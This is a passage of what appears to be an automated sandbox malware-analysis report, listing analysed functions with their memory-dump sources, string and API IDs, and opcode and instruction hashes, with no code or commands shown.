                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF8248746093405BD724CF24D890BAFBBE2EBC6714F28892DE4C547392D679DC92CB4A
                                                                                                                                                                                                                                                                                      Function 024B99D7 Relevance: 3.7, Strings: 2, Instructions: 1211COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: ,)*k$I,~M
                                                                                                                                                                                                                                                                                      • API String ID: 0-936430989
                                                                                                                                                                                                                                                                                      • Opcode ID: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                                                                      • Instruction ID: b2583b24f059ad4d4fa4e233805fc49fd5618b21f27fe0fb07c1a7c37b686979
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33fe9d4cb84d20c875b3126a1f51ea659af71ca5d5df44b5ba46a13c9140ded4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 018238746083509BD7268F24C890BAFBBE2EFC6714F28892EE58547391D771D842CF66
                                                                                                                                                                                                                                                                                      Function 0040DD25 Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Uninitialize
                                                                                                                                                                                                                                                                                      • String ID: PT
                                                                                                                                                                                                                                                                                      • API String ID: 3861434553-4135314810
                                                                                                                                                                                                                                                                                      • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                                      • Instruction ID: 75a7993a4975897b3fffe1a5d6229db9520caabe5b699855c7cd795a636d0404
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68A1C0B4508B818FD326CF69C490A22BFE1EF57300B1996ADC4D25F7A6D339E806CB55
                                                                                                                                                                                                                                                                                      Function 024ADF8C Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 320COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Uninitialize
                                                                                                                                                                                                                                                                                      • String ID: PT
                                                                                                                                                                                                                                                                                      • API String ID: 3861434553-4135314810
                                                                                                                                                                                                                                                                                      • Opcode ID: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                                      • Instruction ID: 5ab83903e5e19c4238e620f9a0cb7adc1d5992d24ea920b69a0b2daf2c890554
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2838c07cfca04fbe2cabb14719c9c0661598261e54099377b9e0bd013184ce3a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4A1F5B46087918FD326CF39C4A0A62BFE1EF57204B1986ADC4E24FB66D339D405CB15
                                                                                                                                                                                                                                                                                      Function 0040A940 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: BE$de
                                                                                                                                                                                                                                                                                      • API String ID: 0-1272349043
                                                                                                                                                                                                                                                                                      • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                                      • Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787
                                                                                                                                                                                                                                                                                      Function 024AABA7 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: BE$de
                                                                                                                                                                                                                                                                                      • API String ID: 0-1272349043
                                                                                                                                                                                                                                                                                      • Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                                      • Instruction ID: d4547235d9d9c015f05970d1daac53b72a454e7ba82df4a8f7ce07e2e776095d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1D12A7164C3644BD728DF2888616AFFBE2EFD1208F18492DE8D19B391D775C906CB82
                                                                                                                                                                                                                                                                                      Function 0043CB20 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                      • String ID: @$ihgf
                                                                                                                                                                                                                                                                                      • API String ID: 2994545307-73152791
                                                                                                                                                                                                                                                                                      • Opcode ID: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                                                                      • Instruction ID: cc847ee4b474d0efd8a0440ac8e8375c275344d67ffd0b73ceeb6cce142f8bff
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b76e2e665ab3f88f5f7ecfe080de7e118712eda281a429bd95dd341074e0adb8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6D413AB1A043018BD714CF24D89277BB7A1FFCA318F14952DD489AB391E739E915C78A
                                                                                                                                                                                                                                                                                      Function 024DCD87 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: @$ihgf
                                                                                                                                                                                                                                                                                      • API String ID: 0-73152791
                                                                                                                                                                                                                                                                                      • Opcode ID: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                                                      • Instruction ID: ad871adc90c38221081cab6931d7c89faaf8633b1c441c94448c1023ba0a2959
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f9d2302128f83c98de01ee7664bc871aec8e86cdf99c8f751253d6371e8ab131
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A4113B1A043118BD714CF24C8A177BB7E2FFD2328F14862EE4959B390E7359905CB82
                                                                                                                                                                                                                                                                                      Function 024B554C Relevance: 2.6, Strings: 2, Instructions: 113COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: Z\$^P
                                                                                                                                                                                                                                                                                      • API String ID: 0-3724859648
                                                                                                                                                                                                                                                                                      • Opcode ID: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                                                      • Instruction ID: 814d97f66e8dcbd77c6b29fa727e2e8c3803f385887a61436a1b32d5f4ae2adc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f7f96cc206f4a51d8ad8bab145ebd28e0a9ebd1b083b1ab060fd53171580dc2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3941E0B1A11600CFC719CF28C8A1AA3B7B2FF59314B06819DD49A8F7A4E778E401CB65
                                                                                                                                                                                                                                                                                      Function 0042750D Relevance: 2.5, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: AzB$`rB
                                                                                                                                                                                                                                                                                      • API String ID: 0-365317308
                                                                                                                                                                                                                                                                                      • Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                                                      • Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A
                                                                                                                                                                                                                                                                                      Function 00427326 Relevance: 2.5, Strings: 2, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: AzB$`rB
                                                                                                                                                                                                                                                                                      • API String ID: 0-365317308
                                                                                                                                                                                                                                                                                      • Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                                                      • Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A
                                                                                                                                                                                                                                                                                      Function 00417582 Relevance: 2.2, Strings: 1, Instructions: 985COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: c$
                                                                                                                                                                                                                                                                                      • API String ID: 0-2516980088
                                                                                                                                                                                                                                                                                      • Opcode ID: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
                                                                                                                                                                                                                                                                                      • Instruction ID: 8ddf10d90ef0e2d4ef8b1445a283de62437e0b874c2761f734db7318cd05b52d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3ebbaef30565196f274c8e89b57c4db92bba8447b693202f34b7e37aa6ab2c1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F6205742087418FD7258F28C8907A7BBF2FF5A310F19866DD4964B792D338E846CB58
                                                                                                                                                                                                                                                                                      Function 00415F66 Relevance: 1.9, Strings: 1, Instructions: 605COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: A67H
                                                                                                                                                                                                                                                                                      • API String ID: 0-3389657328
                                                                                                                                                                                                                                                                                      • Opcode ID: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
                                                                                                                                                                                                                                                                                      • Instruction ID: 0278bb419d5cbe6ad6e5f6493e2644ba58dfc9cb1efb87832400374d385c740d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8cecec2cc2e6e176e845aa1397af3039d5d67745fd03e8a435e279ebfdfa12b2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A81225B4604601DFC724CF28D891767B7E2FF5A314F15892DE4AA87792D738E882CB58
                                                                                                                                                                                                                                                                                      Function 024B8F35 Relevance: 1.8, Strings: 1, Instructions: 598COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: [
                                                                                                                                                                                                                                                                                      • API String ID: 0-3878419350
                                                                                                                                                                                                                                                                                      • Opcode ID: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
                                                                                                                                                                                                                                                                                      • Instruction ID: b21cc2b050115c7623b6ec1a958cf1466b81d274976b46cd1ee1cdbbc96f4999
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5eb09604ed9747dca5d4520930199d487a8f62beec0cfa78d34f9f01c84922a2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 05022075600702CBCB25CF29C8D16A3B7F2FF99314B19959DC5864FBA5EB39A402CB60
                                                                                                                                                                                                                                                                                      Function 00436C00 Relevance: 1.7, Strings: 1, Instructions: 453COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                      • String ID: ,)*k
                                                                                                                                                                                                                                                                                      • API String ID: 2994545307-1228391949
                                                                                                                                                                                                                                                                                      • Opcode ID: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
                                                                                                                                                                                                                                                                                      • Instruction ID: bb41e8b13f176b197a8e10d4dde50fa6e0ce8ca76c9034d38a3517968bb0ad29
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee2511f57d07ddc5dcb30b837298e4dd3a8f37d85f1e3bd68ab8ff00062e0fa2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F4C15A75A083116FD724DF21D881A2BB7E2ABDE704F16AA2EE5C553781D638DC04C78A
                                                                                                                                                                                                                                                                                      Function 024D6E67 Relevance: 1.7, Strings: 1, Instructions: 453COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: ,)*k
                                                                                                                                                                                                                                                                                      • API String ID: 0-1228391949
                                                                                                                                                                                                                                                                                      • Opcode ID: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
                                                                                                                                                                                                                                                                                      • Instruction ID: 4a2ef8966b13bb965d553df0408a37cdfc8c3a2d46ad8e213b6e521951f9e701
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81a23c36fe8827921ec37ff3d571e3748504ad247d1e8451f876af876380c648
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 98C15775A083505BD324DF61C8A0A3FFBE6ABD6718F198A2EE5C657780D7319C41CB82
                                                                                                                                                                                                                                                                                      Function 00427DA2 Relevance: 1.7, Strings: 1, Instructions: 447COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: m
                                                                                                                                                                                                                                                                                      • API String ID: 0-3775001192
                                                                                                                                                                                                                                                                                      • Opcode ID: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
                                                                                                                                                                                                                                                                                      • Instruction ID: 244b2cefeb1f5bc2c232bbf8925c55c2a37160be3d0d910679bc8471d4ecd8fe
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 06c799813fc5a4d2ee9ed489dbc55438d2506092defca999b9944da2a72204aa
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C6D134B5A093109FC320DF24D89126FB7A2EF96304F49492EE9D587352EB38D905CB96
                                                                                                                                                                                                                                                                                      Function 00425990 Relevance: 1.7, Strings: 1, Instructions: 445COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                      • String ID: 167H
                                                                                                                                                                                                                                                                                      • API String ID: 2994545307-2704650348
                                                                                                                                                                                                                                                                                      • Opcode ID: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
                                                                                                                                                                                                                                                                                      • Instruction ID: bf2ece600eee686df0bdf1c423ff2d06ad0eddb47c6a63d29c729e7fd306df6e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f7913c2959e065ee0aa93dc333931d67ae9576e316e456e6394b25aa21ac57b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35D19932B147244BD714CF25A8816BBB792EBD5314F99862EE885973C1E7389D05838A
                                                                                                                                                                                                                                                                                      Function 024C5BF7 Relevance: 1.7, Strings: 1, Instructions: 445COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: 167H
                                                                                                                                                                                                                                                                                      • API String ID: 0-2704650348
                                                                                                                                                                                                                                                                                      • Opcode ID: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                                                                      • Instruction ID: 1848d3e661a793a4af85317c448d25518d628e75742eb23768de9142239a0ef6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58de4fbba54e7a4bbde6691defe3cface4003d97f8efe76fd78e15d75b2f64aa
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91D1877A6043004BD758CF2DCC816AFB792EFD1324F69862EE985A73C1D734A906CB81
                                                                                                                                                                                                                                                                                      Function 024BC921 Relevance: 1.7, Strings: 1, Instructions: 445COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: .
                                                                                                                                                                                                                                                                                      • API String ID: 0-1505114982
                                                                                                                                                                                                                                                                                      • Opcode ID: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                                                                      • Instruction ID: 54d3a9570cf4d68481e54b2de5fe4d32e5bb460f2895a1ee213923ea04653f6f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c1d9dc035ef9ac2c180075a27f0a445723f05ffce5a25362c8fe712cfd5ed31
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2C107B5D002128FCB25CF29C8916BBB7B1FF95310F19825ED895AB790E734A841CBA0
                                                                                                                                                                                                                                                                                      Function 0041C6BB Relevance: 1.7, Strings: 1, Instructions: 444COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
